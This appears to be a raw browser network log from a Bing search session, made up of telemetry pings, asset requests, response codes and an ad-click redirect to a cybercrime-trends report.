%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220707950%2C%22Name%22%3A%22GAMV2.RenderShareCommonControl%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Request
GET https://www.bing.com/welcomescreenassets?IG=92027AEB1C3C42769F3D4EA5938FBAC6&IID=SERP.5903HTTP Request
GET https://www.bing.com/fd/ls/l?BF=MSJ1&IG=92027AEB1C3C42769F3D4EA5938FBAC6&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}]HTTP Request
GET https://www.bing.com/fd/ls/l?BF=MSJ0&IG=92027AEB1C3C42769F3D4EA5938FBAC6&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}]HTTP Response
200HTTP Response
200HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Request
GET https://www.bing.com/aes/c.gif?type=mv&tids=71,73&rg=1d03bcc77b2d472484cf2e8fec86c32c&reqver=1.0HTTP Request
GET https://www.bing.com/aes/c.gif?type=mv&tids=77,79,81,83&rg=1d03bcc77b2d472484cf2e8fec86c32c&reqver=1.0HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
204HTTP Response
204HTTP Request
GET https://www.bing.com/rp/heOXyRFzkLjRIgrn2jdcirMbXok.pngHTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.ClientInst%22,%22FID%22:%22CI%22,%22Name%22:%22ResizeObserverLimit%22}]HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/rp/0Kv2EbGZU7NV-wbo0XwhxQSY_1k.svgHTTP Request
GET https://www.bing.com/rp/v6T2hhKPV0ncl46oF7sbuo4xFNE.svgHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220707952%2C%22Name%22%3A%22BindedScrollEvents%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22CustomData%22%3A%22%7B%5C%22metrics%5C%22%3A%7B%5C%22ChatInitialUIReady%5C%22%3A-1%7D%2C%5C%22convId%5C%22%3Anull%2C%5C%22Tone%5C%22%3A%5C%22Balanced%5C%22%2C%5C%22IsCCP%5C%22%3Afalse%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220707996%2C%22Name%22%3A%22PerformanceData%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220708066%2C%22Name%22%3A%22GAMV2.RenderShareCommonControlSuccess%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220708066%2C%22Name%22%3A%22GAMV2.InitShareCommonControl%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708561%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708561%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22ShowAnimation%22%3A%22%22%2C%22RedDotAnimation%22%3A%22true%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AnimationLoad%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1709220708565%2C%22Name%22%3A%22AnimationLoad%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2211%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22bingpages%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2212%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5DHTTP Request
GET https://www.bing.com/geolocation/write?isBlocked=true&sid=172BBB3C780F696B1A6EAF0879376803&clientsid=undefinedHTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialConfigDisabled%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1709220708582%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5DHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708587%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708587%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708588%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708803%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/secure/Passport.aspx?popup=1&ssl=1HTTP Request
POST https://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=92027AEB1C3C42769F3D4EA5938FBAC6&ID=SERP,5960.1&url=javascript%3A%20void(0)HTTP Response
200HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Response
200HTTP Response
204HTTP Request
GET https://www.bing.com/ipv6test/test?FORM=MONITRHTTP Response
200HTTP Request
GET https://www.bing.com/th?id=OBFB.1B096C6DCB92C2B9A732929A92AF5585&pid=Fb&qlt=99&r=0HTTP Request
GET https://www.bing.com/th?id=OBFB.1E928B2B86E3D4E8ED1D46B83E667303&pid=Fb&qlt=99&r=0HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22show%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Click%22%2C%22TS%22%3A1709220709450%2C%22Name%22%3A%22RejectAll%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220710504%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220710716%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220711890%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220712711%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220714294%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Response
200HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Response
204HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220720758%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Response
200HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Response
204HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220723552%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220724484%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Response
200HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Response
204HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Response
204HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220725533%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Response
200HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Response
204HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220727612%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Response
200HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Response
204HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220729080%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220730398%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220731982%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Response
200HTTP Response
204HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220734685%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220735044%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220735236%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220735367%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220735431%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220736183%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220736275%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220736578%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22hide%22}]HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220737244%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220737619%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738104%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738172%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738235%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738670%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738716%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738892%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220739355%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220739987%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220740133%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Response
200HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Response
204HTTP Request
POST https://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=92027AEB1C3C42769F3D4EA5938FBAC6&ID=SERP,5821.1,Ads&url=https%3A%2F%2Fwww.bing.com%2Faclk%3Fld%3De89lQxGSBQhj25FIWRaijH0TVUCUxqK7zGAdhob7g3cXGgpijWu33dAfTu4J1h7YxIuDA_7d4H18SS7fvOCymR0J3_8bmYzDBtVq91Elx-TzAWANV5PQc7HyhKjZvHubfnivVIn-MDCmpG9LXSt9cQGTlwMqm7DTStXtvNWr4bkxRtPExr%26u%3DaHR0cHMlM2ElMmYlMmZzb3NhZmUtYXdhcmVuZXNzLmNvbSUyZnJlc291cmNlcyUyZnJlcG9ydHMlMmZjeWJlcmNyaW1lLXRyZW5kcyUyZiUzZnV0bV90ZXJtJTNkQ3liZXIlMjUyMHRocmVhdCUyNnV0bV9jYW1wYWlnbiUzZFVLSV9FTl9Ob24tYnJhbmRlZF9RMTIwMjMlMjZ1dG1fc291cmNlJTNkYmluZyUyNnV0bV9tZWRpdW0lM2RwYWlkJTI2aHNhX2FjYyUzZDIzMTU2MDk3MzclMjZoc2FfY2FtJTNkMTk1NjY4NDQ1MjklMjZoc2FfZ3JwJTNkMTE3MDk4MTcxODI1MTEwMyUyNmhzYV9hZCUzZCUyNmhzYV9zcmMlM2RvJTI2aHNhX3RndCUzZGt3ZC03MzE4NzA1MDkyNTk0MCUzYWxvYy0xODglMjZoc2Ffa3clM2RDeWJlciUyNTIwdGhyZWF0JTI2aHNhX210JTNkcCUyNmhzYV9uZXQlM2RhZHdvcmRzJTI2aHNhX3ZlciUzZDMlMjZtc2Nsa2lkJTNkMGJlNWFkZWQwNTk1MThiNThlMTljODBkYTZmMTBkNjYlMjZ1dG1fY29udGVudCUzZEN5YmVyJTI1MjB0aHJlYXRz%26rlid%3D0be5aded059518b58e19c80da6f10d66%26ntb%3D1HTTP Request
GET https://www.bing.com/aclk?ld=e89lQxGSBQhj25FIWRaijH0TVUCUxqK7zGAdhob7g3cXGgpijWu33dAfTu4J1h7YxIuDA_7d4H18SS7fvOCymR0J3_8bmYzDBtVq91Elx-TzAWANV5PQc7HyhKjZvHubfnivVIn-MDCmpG9LXSt9cQGTlwMqm7DTStXtvNWr4bkxRtPExr&u=aHR0cHMlM2ElMmYlMmZzb3NhZmUtYXdhcmVuZXNzLmNvbSUyZnJlc291cmNlcyUyZnJlcG9ydHMlMmZjeWJlcmNyaW1lLXRyZW5kcyUyZiUzZnV0bV90ZXJtJTNkQ3liZXIlMjUyMHRocmVhdCUyNnV0bV9jYW1wYWlnbiUzZFVLSV9FTl9Ob24tYnJhbmRlZF9RMTIwMjMlMjZ1dG1fc291cmNlJTNkYmluZyUyNnV0bV9tZWRpdW0lM2RwYWlkJTI2aHNhX2FjYyUzZDIzMTU2MDk3MzclMjZoc2FfY2FtJTNkMTk1NjY4NDQ1MjklMjZoc2FfZ3JwJTNkMTE3MDk4MTcxODI1MTEwMyUyNmhzYV9hZCUzZCUyNmhzYV9zcmMlM2RvJTI2aHNhX3RndCUzZGt3ZC03MzE4NzA1MDkyNTk0MCUzYWxvYy0xODglMjZoc2Ffa3clM2RDeWJlciUyNTIwdGhyZWF0JTI2aHNhX210JTNkcCUyNmhzYV9uZXQlM2RhZHdvcmRzJTI2aHNhX3ZlciUzZDMlMjZtc2Nsa2lkJTNkMGJlNWFkZWQwNTk1MThiNThlMTljODBkYTZmMTBkNjYlMjZ1dG1fY29udGVudCUzZEN5YmVyJTI1MjB0aHJlYXRz&rlid=0be5aded059518b58e19c80da6f10d66&ntb=1HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Response
200HTTP Response
200HTTP Response
204HTTP Request
GET https://www.bing.com/favicon.icoHTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:31,%22BC%22:31,%22SE%22:-1,%22TC%22:-1,%22H%22:141,%22BP%22:145,%22CT%22:146,%22IL%22:10},%22ad%22:[43,396,1263,609,1263,4731,1],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspx?HTTP Response
204HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1709220749187%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22200%22%2C%22Downlink%22%3A%2210%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1709220749187%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749202%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A86%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SuperappConnector%22%2C%22CustomData%22%3A%22%7B%5C%22sysMsg%5C%22%3A%5C%22file%20loaded%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A%22Global%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749231%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749231%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1709220749231%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1709220749231%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.MiniTP%22,%22FID%22:%22CI%22,%22Name%22:%22MiniTp%22,%22Text%22:%22show%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.MiniTP%22,%22FID%22:%22CI%22,%22Name%22:%22FullTP%22,%22Text%22:%22show%22}]HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2219%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]HTTP Response
200HTTP Request
